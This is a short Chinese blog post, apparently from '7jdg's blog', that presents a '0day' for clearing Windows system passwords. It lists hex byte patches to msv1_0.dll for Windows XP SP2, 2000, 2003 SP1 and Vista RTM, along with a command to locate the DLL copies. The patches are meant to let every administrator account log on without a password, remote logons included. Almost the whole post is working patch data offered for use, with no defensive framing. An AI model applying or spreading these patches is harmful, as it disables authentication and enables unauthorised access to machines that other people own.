清空系统密码(0day)

7jdg's blog 这东西再放都长毛了,放出来....精灵还写了个利用工具,找不到了.回头补上.. ystem32下 有个msv1_0.dll xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D 2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF 2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D 2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D 都是前两个字节改为
E0 00 全部管理员帐号无须密码登陆
包括远程登陆的 改两个目录的 msv1_0.dll 用16进制
dir /s c:\windows\msv1_0.dll